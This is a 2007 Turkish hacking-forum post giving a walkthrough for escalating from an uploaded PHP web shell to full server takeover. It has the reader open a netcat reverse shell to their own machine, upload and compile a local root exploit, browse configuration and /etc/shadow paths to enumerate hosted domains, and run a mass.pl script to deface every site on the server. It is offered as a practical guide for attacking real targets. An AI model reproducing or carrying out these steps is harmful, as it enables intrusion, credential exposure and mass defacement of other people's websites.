frmfr

herşeyi kendi kafa denklerinizle paylaşa biliceyiniz biryer
 
AnasayfaAnasayfa  PortalliPortalli  SSSSSS  GaleriGaleri  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  AramaArama  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

Paylaş | 
 

 server hack...

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
IISc@nCII
Michael Schumacher'in ikizi
Michael Schumacher'in ikizi
avatar

Mesaj Sayısı : 116
Yaş : 25
Kayıt tarihi : 13/10/07

MesajKonu: server hack...   C.tesi Ekim 13, 2007 3:19 pm

herkes shell ile web sitesi hackliyor artık hemen hemen bütün basit sitelerde RFI denilen açıklardan var. peki bu basit portal sitelerinden yola çıkarak neler yapılır dersiniz.?

herhangi bri web sitene yedirmiş oldugumuz shell(c99 r57 bypass vs vs.) ile bütün SERVER ı ele geçirmek mümkün.

®BUNU UYGULAMALI YAPALIM®

ÖN HAZIRLIK:

öncelikle www.hedefsite.com yedirmiş oldugumuz shell üzerinden yola çıkarak server elegeçiriyoruz.

öncelikle bir siteye c99 baglandı isek bu siteye index atmadan önce r57 txt de açıp kaydederken .php diye kaydediyoruz bilgisayarımıza.

daha sonra c99 banladıgımız siteye upload bölümünde r57.php upload ediyoruz. upload ettigimiz r57.php açıyoruz.

burası bir kenarda dursun işimdi diyer hazırlıkları yapalım:

modemimizde port açmamız gerekecek şimdi modem ayarlarından herhan gibir (6589) port açıyor.

netcat denen ufak bir programı nidiriyoruz ve pcmizde system32 açıyoruz.

®HAZIRLIK TAMAM UYGULAMAYA GEÇİYORUZ®

şimdi ön hazırlıkları tamamladık

yukarda r57.php upload ettigimiz siteye gidip upload edilin l ink üzerinden r57 çalıştıroyoruz.

daha sonra başlat/çalıştır/cmd

diyiyoruz karşımıza glen ekranda nc -vv -l port no yazıyoruz ve karşımza listening any 6589... diye bri yazı gelecek bunu oldugu gibi bırakıyoruz ve tekrar hedef siteye dönüyoruz.
r57.php baglanılmış siteni el altında back connect seçenegi var ordaki port yazılı olan yeri silip biraz önce netcat ile verdgimizi komuttaki potu yazıyoruz ve connect diyoruz.

biraz bekledikten sonra yukarda verdigimiz listening any 6589... altında connect to 10.0.0.2 server.hedefsite.com ve server sürümü karşımza geliyor. evet artık server girdik artık bütün serverda istedigimiz yapacagız.

PEKİ NASIL :

şimdi yukardaki yazıda server sürümü atıyorum linux 2.6.14 olsun

herhangi bir exploit sitesinden bu exploit bulup bilisayarımıza (isim).c diye kaydediyoruz. burdaki eexploit adımız root olsun.

daha sonra siteye r57.php upload eder gibi root.c upload ediyoruz.

yine ms dos ekranımıza dönüp ls yazıp enter diyoruz. ve karşımza exploit yazılı oldugu bbölge geliyor örnegin (linux2.6.14.c) devam ediyoruz

gcc -o root root.c diyoruz.DİKKAT BİRİNCİ YAZDIGIMIZ SONUNDA .C YOK.
ls tekrar yazdımızda busefer karşımıza alt alta iki tane root yazsısı geliyor. birinci root.c ikinsi ise root

bu demek oluyorki exploit derlendi kullanıma hazır.

chmod 777 root diyoruz. (bunu dememizdeki amaç serverda exploit tam yetki saglamak)

./root deyip exploit çalıştırıyoruz. ve beklemeye koyuluyoruz.

biraz bekledikten sonra uid-0(root) gid-0(root)... yazılar gelecek. EVET ARTIK SERVER LOCAL OLARAK BAGLANDIK VE SİSTEMİ TAMAMEN ELE GEÇİRDİK

ŞİMDİ BAKALIM BU SEVERDA KAÇ TANE DOMAİN VAR.

domainlere bakacagımız dinler

/etc/httpd/conf/httpd.conf

/var/cpanel

etc/shadow
/var/named



bu dizinlerden cd/etc/httpd/conf/httpd.conf geçiyoruz(yukardakdizinlerden başkarına geçiş yapabilirsiniz illa bu dizinde oalcak diye brişey yok)

ls ve serverdaki main listesine ulaşıyoruz.

EVET ARTIK BÜTÜN SERVER İNDEX ATALIMMI

DEVAM EDİYORUZ

şimdi bize buiş için gerekli olan mass.pl adında bir perl exploit bu exploit de yukarda r57.php upload ettigmiz dizine upload ediyoruz.

r57ekranın en üstündeki pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

yine msdos da kaldıgımız yerde

cd pwp deki uzantıyı yazıp enter diyoruz

perl mass.pl yazıp enter deyip çalıştıriyoruz. exploit baglanırken önceden hazırlamış oldugumuz index i en başta r57.php upload ettgiimiz yerede index.html şeklinde upload ediyoruz.

upload işlemi bittikten sorna

ms dosa kaldımız yere

perl mass.pl pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

enter diyoruz ve artık bütün siteye index atmış olduk.

_____________________GEREKLİ DÖKÜMANLAR_________________

ACTİVE PERL. MASS.PL NETCAT
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://frmhack.forumotion.com
 
server hack...
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Counter Strike 2d Server krumak
» ArkadaŞlar Msn Şifre Kırıcı Ve Msn Dondurucu Ve PvP Server Çökertme
» - Server Kurulumu Bölümü İndexi -
» 1229 pvp servlerları
» SERVER İP: 95.130.174.127 ## Zor Myko Server Cok Güzel Sw ##

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
frmfr :: hack :: web hacking-
Buraya geçin: